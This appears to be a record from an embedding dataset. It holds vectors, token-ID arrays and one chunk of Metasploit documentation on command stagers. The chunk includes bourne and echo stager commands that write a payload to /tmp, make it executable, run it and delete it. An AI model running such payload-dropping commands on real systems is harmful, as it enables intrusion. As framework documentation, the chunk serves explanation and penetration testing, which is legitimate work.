-0.5653390288352966, -0.3671342730522156, -0.9963893890380859, 0.6849693655967712, 0.8048374652862549, -0.1289159208536148, 0.04331451281905174, 0.10475654900074005, 0.5924476385116577, -0.765641987323761, 0.33904409408569336, 0.32244670391082764, -1.0313550233840942, 0.8546388149261475, -0.20577706396579742, 0.5697614550590515, -0.20121291279792786, -1.1033048629760742, 0.2830813527107239, 0.22359710931777954, 0.4430982768535614, 0.08215990662574768, 0.01667969487607479, 1.1289438009262085, -0.6233227252960205, 0.48708376288414, -1.2423275709152222, -0.9736238718032837, 0.9192060232162476, -0.21604853868484497, 0.6684229373931885, 0.5323059558868408, -0.3244965076446533, -0.49723806977272034, -0.5518291592597961, -0.362927109003067, -0.6836690306663513, 0.7112992405891418, -0.4144989550113678, 0.3898724913597107, 0.10459456592798233, 0.4976562559604645, -0.6813350319862366, -0.543322741985321, -0.736243724822998, -1.2163969278335571, 0.3245997428894043, 0.5862646102905273, 0.5126230716705322, -0.001164305955171585, -1.2164461612701416, 0.39516061544418335, 0.3159293830394745, -0.04335913807153702, 0.6865537166595459, -0.8871138095855713, -0.029646795243024826, -0.2858143746852875 ]
[ 6784, 2080, 1012, 1013, 5796, 11329, 5644, 9890, 2000, 2224, 1996, 1056, 6199, 2361, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 1056, 6199, 2361, 1005, 1033, 2030, 2275, 1996, 1024, 1056, 6199, 2361, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 1056, 6199, 2361, 1007, 2017, 2097, 2036, 2342, 2000, 3342, 2000, 2275, 1996, 4132, 1999, 1996, 27425, 1024, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 4204, 18223, 1999, 6767, 3489, 1011, 4773, 2890, 15500, 1011, 3645, 2069, 3406, 2224, 1996, 4204, 18223, 1999, 6767, 3489, 1011, 4773, 2890, 15500, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 8827, 2232, 1035, 1999, 6767, 3489, 8545, 13578, 15500, 1005, 1033, 2030, 2275, 1996, 1024, 8827, 2232, 1035, 1999, 6767, 3489, 8545, 13578, 15500, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 8827, 2232, 1035, 1999, 6767, 3489, 8545, 13578, 15500, 1007, 15803, 3094, 2754, 2099, 1011, 4800, 4132, 4179, 17848, 6263, 1024, 4261, 2509, 10760, 15803, 3094, 2754, 2099, 6753, 3674, 7248, 3272, 2005, 3645, 1012, 2074, 2066, 2116, 2060, 2754, 2869, 1010, 2009, 7009, 1037, 2918, 21084, 12359, 18093, 2000, 9785, 1010, 2021, 2059, 2009, 5363, 2000, 21933, 3207, 2009, 2478, 2176, 2367, 10954, 1024, 2918, 21084, 1010, 7480, 14540, 1010, 18750, 1010, 1998, 2566, 2140, 1012, 2023, 2003, 2200, 6179, 2065, 1996, 4539, 1521, 1055, 9808, 2003, 21446, 1012, 2017, 2064, 2156, 1996, 2126, 2009, 4740, 2000, 2224, 3674, 21933, 4667, 5461, 2011, 4292, 12034, 9232, 2000, 2995, 1998, 12106, 2019, 18077, 2008, 2038, 15803, 2004, 1037, 3569, 3094, 2754, 2099, 14894, 1998, 17739, 2009, 2004, 1996, 14894, 1024, 1031, 1008, 1033, 7013, 3094, 2754, 2099, 1024, 1031, 1000, 9052, 1011, 1050, 1042, 2692, 2615, 2213, 10623, 18410, 19062, 11057, 11057, 11057, 11057, 11057, 27131, 26952, 19736, 11057, 21996, 3676, 11057, 11057, 11057, 3676, 11057, 11057, 11057, 11057, 11057, 11057, 11057, 11057, 11057, 11057, 11057, 11057, 21996, 7113, 11057, 3676, 11057, 2050, 13360, 11057, 21996, 11057, 23278, 11057, 11057, 11057, 11057, 11057, 11057, 11057, 11057, 5243, 11057, 11057, 11057, 11057, 20784, 11057, 11057, 11057, 2050, 1009, 19930, 11057, 11057, 11057, 2497, 2620, 20784, 11057, 11057, 11057, 11057, 20784, 11057, 11057, 11057, 11057, 2213, 2546, 2683, 4160, 2278, 5737, 2480, 2705, 5638, 3593, 2480, 2078, 12458, 2140, 14702, 2243, 7011, 8490, 14697, 2860, 5737, 16257, 2497, 2549, 25974, 6559, 1053, 2615, 2140, 19062, 6588, 2213, 12155, 2278, 2595, 2475, 16429, 2595, 2290, 2620, 10343, 7646, 6679, 11927, 4014, 2692, 2072, 2629, 16098, 2099, 18684, 11253, 2232, 2620, 20974, 11493, 25687, 3676, 4886, 7685, 2094, 2860, 2615, 2480, 5332, 18684, 2229, 2615, 3501, 1013, 1022, 2140, 2692, 25708, 2094, 14702, 2487, 2232, 19062, 3995, 10343, 23111, 16150, 2232, 2475, 2094, 2860, 2615, 2480, 2860, 2615, 2683, 19190, 27421, 2629 ]
metasploit
107.txt
9
##x2o8wgobxw8fxmp + wg8fsixaeo3 / 5g = = > >'/ tmp / xtmnq. b64'; ( ( which base64 > & 2 & & base64 - d - ) | | ( which base64 > & 2 & & base64 - - decode - ) | | ( w hich openssl > & 2 & & openssl enc - d - a - base64 - in / dev / stdin ) | | ( which python > & 2 & & python - c'import sys, base64 ; pri nt base64. standard _ b64decode ( sys. stdin. read ( ) ) ;') | | ( which perl > & 2 & & perl - mmime : : base64 - ne'print decode _ base64 ( $ _ )') ) 2 > / dev / null >'/ tmp / ipuov'<'/ tmp / xtmnq. b64'; chmod + x'/ tmp / ipuov';'/ tmp / ipuov'; rm - f'/ tmp / ipuov'; rm - f'/ tmp / xtmnq. b64'" ] to use the bourne stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['bourne'] or set the : bourne key to execute _ cmdstager : execute _ cmdstager ( flavor : : bourne ) echo command stager - multi platformlinemax minimum : 26the echo command stager is suitable for multiple platforms except for windows. it just echos the payload, chmod and execute it. an example of that looks similar to this : echo - en \ \ x41 \ \ x41 \ \ x41 \ \ x41 > > / tmp / payload ; chmod 777 / tmp / payload ; / tmp / payload ; rm - f / tmp / payload to use the echo stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['echo'] or set the : echo key to execute _ cmdstager : execute _ cmdstager ( flavor : : echo ) printf command stager - multi platformlinemax minimum
[ -0.14249694347381592, -0.6833497881889343, 0.10899987816810608, 0.8407416343688965, 0.17865705490112305, 0.0824490562081337, -0.2418445348739624, 0.15618230402469635, 0.32402145862579346, 0.44989386200904846, -0.2147880345582962, -0.12744730710983276, 0.8829881548881531, -0.08403793722391129, -0.8917112946510315, -0.5475979447364807, -0.8658643960952759, -0.2746099829673767, -0.7255394458770752, -0.23106025159358978, 0.037059150636196136, -0.07572534680366516, -1.2170774936676025, -0.5213462710380554, 0.1540268510580063, -0.09288123995065689, 0.7624219655990601, 0.5259837508201599, 0.5123992562294006, 0.12759950757026672, 0.4512310326099396, -0.5381659269332886, -0.13106919825077057, -0.7330315709114075, 0.46270525455474854, -0.06771915405988693, 0.7979955673217773, 0.11143728345632553, -0.003753971541300416, -0.10129058361053467, -0.03191144019365311, -0.3332471549510956, 0.036567363888025284, -0.3125038743019104, -0.6779391765594482, -1.031745433807373, 0.5725874304771423, 0.028610587120056152, 0.7737882733345032, -0.33111968636512756, 0.9035898447036743, -0.01060300599783659, -0.002833891659975052, -0.228055939078331, 0.4444095492362976, -0.057277776300907135, -0.25525426864624023, -0.21827419102191925, -0.3286849558353424, -0.1603151559829712, -0.17233149707317352, 0.04615331441164017, 0.648010790348053, -0.5294671654701233, -0.23565344512462616, -0.4466322958469391, 0.2966773509979248, -0.6213431358337402, -0.1599178910255432, -0.5964134931564331, -0.8228150010108948, 0.5339488983154297, -0.7032307386398315, -0.22886012494564056, -0.6419048309326172, -0.3616539537906647, -0.18683193624019623, 0.03436477854847908, 0.18487665057182312, 0.46028387546539307, -0.1563720852136612, 0.5053519606590271, 0.26990005373954773, -0.8620944023132324, 0.06663080304861069, -0.8642009496688843, 0.8349065184593201, 0.6581534743309021, -0.3236982226371765, 0.3657050132751465, 0.5181170701980591, 0.20412109792232513, -0.9339848756790161, -0.9100916981697083, -0.0015505783958360553, 0.549851655960083, 0.10187139362096786, 0.0758630633354187, 0.20063883066177368, -0.2980552911758423, 0.7852635979652405, 1.4324240684509277, 0.6989068984985352, 0.7987352013587952, -0.11870172619819641, 0.19973665475845337, -0.06906428933143616, -0.6361625790596008, -0.14618510007858276, -0.06855601072311401, 0.43468424677848816, -0.5248252153396606, 0.4360661506652832, -1.2446614503860474, -0.7678630352020264, 0.4563845098018646, 0.9135799407958984, 0.007892969064414501, -0.2526650130748749, 1.1587387323379517, -0.6067181825637817, -0.34678977727890015, 0.7750685214996338, -0.4663255512714386, 0.1089671403169632, -0.6237286925315857, 0.12950345873832703, 0.33995911478996277, -0.49382835626602173, -0.8293421268463135, 0.12467360496520996, -0.15587688982486725, -0.28052133321762085, 0.2070678323507309, -0.556424617767334, 1.135101556777954, -0.014200336299836636, 0.28713127970695496, 1.3774573802947998, -0.8083059787750244, 0.02888750284910202, 0.31522563099861145, 0.16289958357810974, 1.1305204629898071, -0.23835724592208862, -0.22715644538402557, -0.02685587666928768, -0.09223826229572296, -0.19374512135982513, 0.38738560676574707, -0.3510846197605133, -0.23137788474559784, 0.46576353907585144, -0.5882613062858582, -0.14644892513751984, 0.5123258233070374, 0.2555820941925049, 0.48705247044563293, -0.5564801096916199, 0.34842172265052795, -0.2821013927459717, 0.9280921220779419, -0.16241484880447388, 0.4050654172897339, -0.17855390906333923, 0.29176968336105347, -0.4405308663845062, -0.4344903826713562, -0.5557090044021606, 0.43220725655555725, 0.6832588911056519, -0.20960715413093567, -0.5669509172439575, 0.016145212575793266, 1.0734694004058838, 1.0928919315338135, 0.03184863179922104, -0.5852510333061218, 0.9186961650848389, 0.4043523669242859, -0.649706244468689, 0.5927066802978516, 0.6440536379814148, 0.6863147616386414, -0.17960447072982788, 0.3486873507499695, -0.7205531001091003, -0.5644547939300537, -0.07314442098140717, -0.08565649390220642, -0.4131995737552643, 0.7500547766685486, 0.38909992575645447, 0.706429660320282, 0.7508693933486938, 0.35930386185646057, -1.1406748294830322, -0.2076149433851242, -0.30350005626678467, -1.7228188514709473, -0.7614911794662476, 0.0917394682765007, -0.24920837581157684, 0.9578201174736023, -0.5557705760002136, -0.08699782937765121, 0.7211808562278748, 0.741466760635376, -0.22873994708061218, 0.46925657987594604, 0.3924187421798706, 0.1507948935031891, -0.6889863014221191, -0.6177247762680054, 0.3216138780117035, -0.04981021583080292, -0.7794126868247986, 0.8507872223854065, -0.2978695333003998, 0.25763994455337524, 0.8112111687660217, 1.035313606262207, 1.3801040649414062, 0.0799156129360199, 0.5703932642936707, -0.11192099004983902, 0.19308918714523315, 0.4625852406024933, -1.1339902877807617, -0.03518779203295708, -0.012762703001499176, 0.2403670996427536, 0.5119636058807373, 1.2498047351837158, 0.5368552207946777, -0.001299795345403254, 1.0379459857940674, 0.5982382297515869, -0.033399797976017, 0.27647310495376587, -0.08012066036462784, 0.32294967770576477, 0.5353095531463623, 0.6763749122619629, 0.5343748331069946, 0.2573142349720001, 0.07050006091594696, -0.19330698251724243, 0.17233110964298248, 0.24162255227565765, 0.8141478300094604, 0.9766735434532166, 0.9699265360832214, 0.06112738326191902, -0.8240602612495422, -0.9888644218444824, 0.6646823287010193, 1.0028390884399414, -0.7103801965713501, -0.8607627749443054, -0.4025532603263855, 0.0034579490311443806, -0.4463704228401184, -0.4284670352935791, 0.2572275996208191, -0.25999772548675537, -0.46059438586235046, 0.7457857728004456, 0.19821946322917938, -0.34397953748703003, -0.8671198487281799, -0.5367449522018433, -0.47054538130760193, -0.852685809135437, -0.36489781737327576, -0.009265300817787647, 0.44273751974105835, -0.4395928680896759, 0.13872401416301727, -0.3095891773700714, -0.6038672924041748, 0.15662291646003723, 0.19643551111221313, 0.42422083020210266, -0.26846858859062195, -0.6048554182052612, -0.6290110945701599, -0.005993320606648922, -0.079204261302948, 1.2342193126678467, 0.053270693868398666, -0.1918477863073349, -0.10378073155879974, -0.1282217800617218, -0.13158027827739716, -0.21557879447937012, 0.35681474208831787, 0.5205622911453247, -0.0261859018355608, -0.18148285150527954, -0.24865169823169708, 0.1571987271308899, 0.5848844051361084, 0.4410953223705292, 0.02011527121067047, 0.45418938994407654, -0.4846673607826233, -0.7549455761909485, 0.3861071765422821, 0.16435383260250092, -0.6460104584693909, 0.41212624311447144, 0.18416446447372437, 0.4280472993850708, -0.5858422517776489, 0.6272118091583252, 0.6384083032608032, -0.17579790949821472, -0.2650408446788788, -0.053769055753946304, -0.019360138103365898, -0.5898692011833191, 0.28493747115135193, -0.5017606019973755, -0.6678515672683716, 0.11540824174880981, 0.11924663931131363, -1.0685415267944336, 0.03648221865296364, 0.0026970254257321358, -0.10196805745363235, -0.5512669086456299, -0.8454675078392029, 0.45760366320610046, -0.04403211176395416, -0.4687039852142334, -0.47505617141723633, -0.5121532678604126, -0.15827922523021698, -0.26277294754981995, -0.6405779719352722, -0.7136698365211487, 0.3551659882068634, 0.6831813454627991, -0.19448326528072357, 0.5916074514389038, -0.2078535407781601, -0.48848986625671387, -0.09431938827037811, 0.36316949129104614, 0.2771846055984497, -0.0419343039393425, 0.21305611729621887, 0.5873048901557922, 0.14230692386627197, 0.5963630676269531, -0.27403193712234497, -0.1658535599708557, 0.44168099761009216, -0.3893710672855377, 0.6354483962059021, -0.34528011083602905, 0.04203272983431816, -0.009559627622365952, -0.2631053328514099, -0.32936927676200867, -0.04780939966440201, -0.561118483543396, 0.8103567957878113, -0.2323174923658371, 0.6342349052429199, -0.3030222952365875, 0.37864845991134644, 0.8318024277687073, -0.20771118998527527, 0.011097346432507038, 1.0292668342590332, 0.12824545800685883, 0.5018540024757385, -1.0015584230422974, 0.0019802965689450502, 0.11203894019126892, -0.19075113534927368, -0.170376256108284, 0.09719010442495346, -0.12486273050308228, -0.44111284613609314, -0.6452487707138062, 0.4406175911426544, -0.2552126944065094, 0.16485530138015747, -0.07540988177061081, -0.3206014037132263, -0.5521301627159119, -0.8074309825897217, -0.3477550446987152, 0.21927253901958466, 0.17079909145832062, 1.0257740020751953, 0.13458676636219025, 0.12524735927581787, 0.522560715675354, -0.24322672188282013, 0.1831817924976349, 0.4561161398887634, -0.06328536570072174, 0.43443459272384644, 0.6441430449485779, -0.2318679690361023, 0.3544740378856659, 0.32001593708992004, -0.08479392528533936, -0.2939859926700592, -0.3007543981075287, -0.9792267680168152, -0.657461404800415, -0.3543927073478699, -0.2591651976108551, 0.514328122138977, 0.22865067422389984, -1.0131789445877075, -0.3761817216873169, -0.2950674891471863, 1.146650791168213, 0.49325183033943176, -0.5866817831993103, -0.6774454712867737, -0.3856046199798584, 0.30927029252052307, -0.2989456057548523, 0.5636634826660156, -0.4558550715446472, -0.9950178265571594, -0.5483052134513855, -0.9780656695365906, -0.05369360372424126, 0.5199596285820007, 0.21457445621490479, 0.5250030755996704, -1.3991625308990479, -0.4192639887332916, 0.19626484811306, -0.18795646727085114, -0.4407605528831482, 0.08791623264551163, 0.0533144511282444, 0.6309235692024231, 0.7884884476661682, -0.4478870928287506, -0.34499725699424744, -0.03367699682712555, -0.32124343514442444, 0.20095126330852509, -0.9527655243873596, -0.5333628058433533, 0.44349145889282227, -0.17217983305454254, -0.4246906638145447, 0.04923344403505325, 0.2848295271396637, -0.6421529054641724, -0.25162264704704285, 0.15680262446403503, -0.15694819390773773, 0.11663524806499481, 1.0436967611312866, -0.16202916204929352, -0.743625819683075, 0.20821313560009003, -0.16091187298297882, 0.17097657918930054, -0.0023073158226907253, -0.2890320122241974, -0.1715852916240692, 0.2766436040401459, 0.07862214744091034, 0.9002912044525146, 0.041536420583724976, 0.43100619316101074, -0.48079487681388855, -0.029008649289608, 0.6624399423599243, 0.12158895283937454, 0.024738047271966934, -0.7356509566307068, -0.9149289131164551, 0.18900084495544434, 0.367789626121521, 0.310120552778244, -0.10911912471055984, 0.026285775005817413, 0.0917786955833435, -0.03150167688727379, -0.06894463300704956, -0.9906402826309204, -1.0584690570831299, -0.18162508308887482, -0.09748721122741699, -0.2091837227344513, 0.13088281452655792, 0.6120776534080505, -0.43606215715408325, -0.6841587424278259, 0.8657085299491882, 0.043399710208177567, 0.26328304409980774, -0.7757681012153625, -0.4379332959651947, -0.7525472044944763, 0.540912926197052, -0.41393524408340454, 0.3235318660736084, -0.3507738709449768, -0.1822386533021927, -0.224588081240654, 0.42278793454170227, 0.5010446906089783, -0.3248901069164276, -0.651658296585083, 0.7156274318695068, 0.14128804206848145, -0.44526398181915283, -0.22595436871051788, 0.762906551361084, -0.6948050260543823, 0.4066191613674164, -0.3008590638637543, -0.2579929232597351, -0.9099376797676086, -0.9826813340187073, -0.10409285873174667, -0.09678816795349121, -0.017420252785086632, -0.04900477081537247, -0.4647011160850525, -0.6137090921401978, 0.5657273530960083, 0.3448936641216278, -0.6057555079460144, -0.33966150879859924, -0.2803329527378082, -0.48934972286224365, -0.3504503667354584, 0.07007182389497757, 0.5921570658683777, -0.6210038661956787, -0.2613591253757477, 0.5058075189590454, -0.2965725362300873, 0.6081719398498535, -0.32268765568733215, 0.31458765268325806, 0.6714422106742859, -0.0021354795899242163, -0.5844762921333313, -0.4859974682331085, 0.23496104776859283, -0.20663253962993622, 0.006895941216498613, -0.24356189370155334, -0.8890411853790283, -0.03181818127632141, -0.413393497467041, -0.20956538617610931, -0.05336175113916397, -0.5258914232254028, 0.11690084636211395, 0.16249287128448486, 0.8498919606208801, -0.3452327251434326, 0.49704867601394653, -0.335640013217926, 0.4800291359424591, 0.42936068773269653, 0.0515177883207798, -0.4492187201976776, 0.8661772608757019, -0.6475876569747925, -0.7162835001945496, 0.24975734949111938, 0.6412192583084106, -0.14090190827846527, 0.8908690810203552, 0.13327063620090485, 0.8355849385261536, -0.3060244619846344, 0.6467285752296448, 0.6579286456108093, 0.1417728066444397, -0.42816630005836487, 0.0038763764314353466, -0.2764330506324768, 0.21864894032478333, -0.16257205605506897, 0.30931326746940613, -0.22835400700569153, -0.2758479714393616, 0.3365029990673065, -0.7540428638458252, 0.29280710220336914, -0.4102645814418793, -0.5679179430007935, 0.6808769106864929, -0.29269030690193176, 0.9584450721740723, -0.35256993770599365, -1.0050638914108276, -0.48505300283432007, 0.3556058704853058, 0.16055043041706085, -0.5291773080825806, 0.44034135341644287, 0.8302806615829468, 1.1812901496887207, -0.4168793559074402, 0.05995116010308266, 0.02863168530166149, -0.2076333612203598, 0.3072541058063507, -0.33049771189689636, -0.908134937286377, 1.0434868335723877, 0.31973183155059814, -1.5508167743682861, -0.6215147972106934, -0.22705857455730438, -0.46682658791542053, -0.26674914360046387, -0.14677616953849792, -1.037505865097046, 0.2665683627128601, 0.6513698697090149, 0.06959245353937149, 1.361774206161499, 0.6398427486419678, 0.23682056367397308, -0.21215446293354034, 0.594831645488739, 0.036966048181056976, 0.6735310554504395, 0.6619742512702942, -0.9016315340995789, 0.02064555324614048, -0.4294058084487915, 0.2955795228481293, -0.06924346089363098, 0.3346540331840515, 1.1956777572631836, 0.9833268523216248, 0.7039982676506042, 0.21471023559570312, -0.6365071535110474, 0.732649564743042, 0.15249943733215332, 0.1929250955581665, 0.6966677904129028, -0.030282601714134216, -0.4600788354873657, -0.10308241844177246, 0.6417208909988403, 0.17890943586826324, 0.6242467761039734, 0.22660252451896667, -0.07977864891290665, -0.01024359930306673, -0.11094591021537781, -0.5495331883430481, -0.7996471524238586, -0.9414043426513672, -0.7331328988075256, 0.06858297437429428, 0.10894040763378143, -0.19418859481811523, -0.25862228870391846, 0.045773789286613464, -0.9021265506744385, -0.20908047258853912, -1.0894125699996948, 0.04258107393980026, -0.366339772939682, -0.23269006609916687, -0.4808885157108307, 0.4265279471874237, -0.608381450176239, -0.44874751567840576, -0.4497329294681549, -0.6988221406936646, -0.8199318647384644, -0.36009228229522705, 0.5310029983520508, 0.5071295499801636, -0.38861456513404846, 0.002121236640959978, -0.3308430314064026, -0.5524084568023682, 0.2952535152435303, -1.1618458032608032, 0.34532231092453003, 1.1571825742721558, -0.41223764419555664, 0.8393106460571289, -0.023553986102342606, 0.28777456283569336, 0.5844300985336304, -0.6544011831283569, 0.3412928283214569, -0.35575059056282043, 0.07328841090202332, 0.41215938329696655, 0.35368815064430237, -0.27510836720466614, 0.060594189912080765, -0.006736120209097862, -0.20879077911376953, -0.0491921603679657, -0.09823500365018845, 0.020921528339385986, -0.1982642561197281, -0.1290801614522934, 0.553950846195221, 0.27682048082351685, -0.048584189265966415, 1.4242959022521973, -0.6149080395698547, 1.0579657554626465, 0.316842257976532, -0.22657665610313416, -0.04804762080311775, 0.4814598560333252, 0.4613810181617737, 0.5515378713607788, 0.25051069259643555, 0.2638339400291443, 0.002057738369330764, 0.3531872034072876, -0.31668388843536377, -0.45378369092941284, -0.3406057059764862, -0.0758843794465065, 0.5242851972579956, 0.5156888365745544, -0.10531287640333176, 0.11329387873411179, 0.5035715103149414, 0.012836783193051815, -0.5118677020072937, -0.14030368626117706, -1.5658730268478394, -0.055855125188827515, 0.33446571230888367, -0.12684665620326996, -0.6044342517852783, 0.2162303775548935, -0.8523572683334351, 0.1101653054356575, 0.21576251089572906, -0.3220457136631012, 0.291775643825531, -0.009028861299157143, 0.25372549891471863, 1.244601845741272, -0.6927555799484253, -0.40353286266326904, -0.8398861289024353, 0.3235648274421692, -0.9012326002120972, -0.8221399784088135, 0.15187370777130127, 0.49682533740997314, 0.19156400859355927, -0.07929304987192154, -0.9746931195259094, -0.07378453016281128, 0.7241096496582031, -0.6854711174964905, 0.26923370361328125, 1.0139961242675781, 0.4345712661743164, 0.3971293568611145, -0.5443673133850098, 0.5078259706497192, -0.11543702334165573, 0.238800048828125, 0.6269401907920837, 0.06755970418453217, -0.036202091723680496, 0.270365834236145, -0.047965001314878464, -0.21516413986682892, 0.8562244772911072, 0.4694346487522125, 0.36752185225486755, -0.44044509530067444, 0.08676477521657944, -0.25857359170913696, 0.5026265978813171, 0.09510854631662369, 0.3689471483230591, -0.4396156072616577, 0.631994903087616, 0.13214577734470367, -0.7812101244926453, -0.4969102442264557, 0.5694122314453125, 0.24625495076179504, -0.49251535534858704, 0.06604080647230148, -0.8533790111541748, 0.05192255601286888, -0.18922066688537598, -0.381928950548172, 0.09252766519784927, 0.2363765388727188, -0.015755092725157738, 0.31344717741012573, -0.1124500036239624, 0.7982742786407471, -0.6109060645103455, 0.16943389177322388, 0.5369521379470825, 0.18849794566631317, -0.1363641917705536, 0.10330374538898468, -0.8253225088119507, 0.3171195089817047, 0.6185056567192078, 0.46710944175720215, -0.22257524728775024, 0.37009409070014954, -0.8091824054718018, 0.21388420462608337, 0.866878092288971, 0.08734188973903656, -0.7359896898269653, 0.3277963697910309, -0.4829659163951874, -0.07060461491346359, -1.153883934020996, 0.69803786277771, 0.11229182779788971, 0.14431607723236084, 0.9629727005958557, -0.10308599472045898, 0.08393700420856476, -0.12392749637365341, 0.3452369272708893, 0.21472607553005219, 0.058874037116765976, 0.12113489210605621, -0.3453983664512634, -0.042329251766204834, 0.49986058473587036, 0.41642433404922485, 0.6117890477180481, -0.33419668674468994, 0.507795512676239, -0.24849914014339447, 0.3133225739002228, -0.33016180992126465, 0.12542714178562164, -0.5628573298454285, 0.37768974900245667, 0.11333458125591278, -0.3342460095882416, 0.19780969619750977, -0.004064652137458324, 0.8696893453598022, -0.12472417205572128, -0.2417350560426712, 0.06641887873411179, -0.13486824929714203, -0.470363587141037, 0.3824477791786194, 0.36026063561439514, -0.24042503535747528, -0.026025187224149704, 0.1887914538383484, 0.36767420172691345, 0.35086309909820557, 0.4711322784423828, -0.08055431395769119, -0.7351776957511902, -0.7375304102897644, -0.31794023513793945, -0.4548937976360321, 0.6439737677574158, -0.11284489929676056, -0.06353922933340073, -0.009389355778694153, -0.861794650554657, -1.1476004123687744, 0.12954024970531464, -0.20158013701438904, -0.16101403534412384, 0.588718593120575, 0.7904714941978455, 0.49110665917396545, 0.7274442911148071, -0.08173705637454987, -0.3040996789932251, 0.2885406017303467, 0.3525872826576233, 0.07312873750925064, 0.3357700705528259, -0.03026694804430008, 0.2544853389263153, 0.3343212604522705, -0.28574231266975403, 0.6139135956764221, -0.1238650381565094, -0.0398511104285717, -1.0499712228775024, 0.3245850205421448, -1.2469806671142578, -0.0947912409901619, -0.05190213769674301, -0.07901043444871902, -0.43773531913757324, -0.19931422173976898, -0.7780038118362427, 0.20527614653110504, -0.41231638193130493, 0.13269606232643127, 0.18606804311275482, 0.029870469123125076, 0.0773003026843071, 0.3220895230770111, -0.25029703974723816, -1.0316373109817505, 4.120163917541504, 0.2969406247138977, -0.32049116492271423, -0.061957597732543945, 0.3284509479999542, 0.48967811465263367, 0.8658190965652466, -0.40730103850364685, 0.08754514157772064, -0.7609685063362122, -0.06863722950220108, -0.4506925046443939, 0.18294355273246765, 0.3137158155441284, 0.6559475064277649, 0.7658782005310059, -0.5803404450416565, -0.3700392544269562, 0.01619638130068779, -0.42835375666618347, -0.3146727681159973, 0.0012251152656972408, -0.7925219535827637, 1.596238613128662, 0.13771098852157593, 0.5092230439186096, 0.4946196675300598, -0.6898424625396729, 0.4263759255409241, -0.5436758399009705, 0.09907909482717514, -0.3390595614910126, 0.24283979833126068, -0.3530545234680176, -0.35162845253944397, -0.2660280168056488, 0.10638020187616348, -0.7795094847679138, -0.36288121342658997, -0.26405608654022217, 0.5599921941757202, 0.6243082880973816, -0.44163069128990173, -1.3698654174804688, 0.08761374652385712, 1.1071897745132446, -1.0668020248413086, 0.3311060070991516, 0.9982114434242249, -0.8966853618621826, 0.63895183801651, -0.2148895561695099, 0.37408003211021423, 0.08152895420789719, -0.7881733775138855, -0.31564363837242126, 0.6250768303871155, 0.1362665593624115, 0.26394277811050415, 0.07907140254974365, 0.6253337860107422, -0.6067970991134644, 0.8596925735473633, -0.24182720482349396, -1.131121039390564, 0.14941248297691345, -0.35543352365493774, -0.16215431690216064, -0.2331264615058899, -0.1436232179403305, -0.0641997680068016, -0.13216449320316315, -0.5819916725158691, -0.5559659600257874, 0.8620850443840027, -0.19241827726364136, 0.010860737413167953, -0.10560603439807892, 0.5839654207229614, -0.5082470774650574, -0.715004563331604, -0.8024122714996338, -0.43337494134902954, 0.055255621671676636, 0.5323746204376221, 0.6444642543792725, -0.12411001324653625, -0.5919416546821594, 0.574592649936676, -0.12350942194461823, 0.5982521176338196, 0.3731542229652405, -0.7269859313964844, 0.28523802757263184, 0.13504847884178162 ]
[ 2595, 2475, 2080, 2620, 27767, 16429, 2595, 2860, 2620, 2546, 2595, 8737, 1009, 1059, 2290, 2620, 10343, 7646, 6679, 2080, 2509, 1013, 1019, 2290, 1027, 1027, 1028, 1028, 1005, 1013, 1056, 8737, 1013, 1060, 21246, 2078, 4160, 1012, 1038, 21084, 1005, 1025, 1006, 1006, 2029, 2918, 21084, 1028, 1004, 1016, 1004, 1004, 2918, 21084, 1011, 1040, 1011, 1007, 1064, 1064, 1006, 2029, 2918, 21084, 1028, 1004, 1016, 1004, 1004, 2918, 21084, 1011, 1011, 21933, 3207, 1011, 1007, 1064, 1064, 1006, 1059, 7632, 2818, 7480, 14540, 1028, 1004, 1016, 1004, 1004, 7480, 14540, 4372, 2278, 1011, 1040, 1011, 1037, 1011, 2918, 21084, 1011, 1999, 1013, 16475, 1013, 2358, 8718, 1007, 1064, 1064, 1006, 2029, 18750, 1028, 1004, 1016, 1004, 1004, 18750, 1011, 1039, 1005, 12324, 25353, 2015, 1010, 2918, 21084, 1025, 26927, 23961, 2918, 21084, 1012, 3115, 1035, 1038, 21084, 3207, 16044, 1006, 25353, 2015, 1012, 2358, 8718, 1012, 3191, 1006, 1007, 1007, 1025, 1005, 1007, 1064, 1064, 1006, 2029, 2566, 2140, 1028, 1004, 1016, 1004, 1004, 2566, 2140, 1011, 3461, 14428, 1024, 1024, 2918, 21084, 1011, 11265, 1005, 6140, 21933, 3207, 1035, 2918, 21084, 1006, 1002, 1035, 1007, 1005, 1007, 1007, 1016, 1028, 1013, 16475, 1013, 19701, 1028, 1005, 1013, 1056, 8737, 1013, 12997, 19098, 2615, 1005, 1026, 1005, 1013, 1056, 8737, 1013, 1060, 21246, 2078, 4160, 1012, 1038, 21084, 1005, 1025, 10381, 5302, 2094, 1009, 1060, 1005, 1013, 1056, 8737, 1013, 12997, 19098, 2615, 1005, 1025, 1005, 1013, 1056, 8737, 1013, 12997, 19098, 2615, 1005, 1025, 28549, 1011, 1042, 1005, 1013, 1056, 8737, 1013, 12997, 19098, 2615, 1005, 1025, 28549, 1011, 1042, 1005, 1013, 1056, 8737, 1013, 1060, 21246, 2078, 4160, 1012, 1038, 21084, 1005, 1000, 1033, 2000, 2224, 1996, 15803, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 15803, 1005, 1033, 2030, 2275, 1996, 1024, 15803, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 15803, 1007, 9052, 3094, 2754, 2099, 1011, 4800, 4132, 4179, 17848, 6263, 1024, 14935, 2063, 9052, 3094, 2754, 2099, 2003, 7218, 2005, 3674, 7248, 3272, 2005, 3645, 1012, 2009, 